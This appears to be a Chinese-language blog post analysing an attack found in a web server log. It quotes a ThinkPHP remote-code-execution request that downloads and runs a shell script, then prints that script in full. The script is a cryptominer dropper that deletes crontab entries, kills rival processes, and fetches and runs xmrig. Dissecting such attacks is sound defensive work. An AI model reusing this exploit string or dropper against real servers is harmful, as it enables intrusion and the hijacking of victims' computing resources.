從 Web Log 學習系統漏洞 37

web log 中記錄到這段, 看來又是 thinkPHP 這類 XAMP 的網路小白

123.56.49.19 - - [26/Apr/2019:20:30:55 +0800] "GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20http://81.6.42.123/a_thk.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"


好奇的去下載當中的 a_thk.sh, 內容如下:

while true;
do
crontab -r;
ps -eo user,pid,time,comm | grep $("whoami") | grep -v 'rogue' | awk 'BEGIN{ FS=":|-"; OFS=""; } { print $1,$2,$3,$4,$5,$6 }' | awk '$3>500' | awk '{print $2}' | xargs -r kill -9
ps x | grep 'networkservic[e]' | awk '{print $1}' | xargs -r kill -9
ps x | grep 'sysupdat[e]' | awk '{print $1}' | xargs -r kill -9
if [ ! -s "/tmp/rogue_s" ]; then
    wget http://81.6.42.123/xmrig_s -O /tmp/rogue_s; chmod +x /tmp/rogue_s;
fi
if [ ! -s "/tmp/rogue_s" ]; then
    wget http://82.72.134.224/xmrig_s -O /tmp/rogue_s; chmod +x /tmp/rogue_s;
fi
if [ "$(ps -eo comm | grep -c "rogu[e]")" -lt "2" ]; then
/tmp/rogue_s -r 1000 --donate-level 1 -o 139.224.15.175:26591 -B -p pass -k --max-cpu-usage=99 ;
fi
sleep 120;
done

看來是針對 Linux 系統的攻擊, 程式當中又要下載 xmrig_s 這個檔, 下載回來看是個編譯過的檔案, 一堆亂碼就不放上來了, 最後把這些 IP 全部封鎖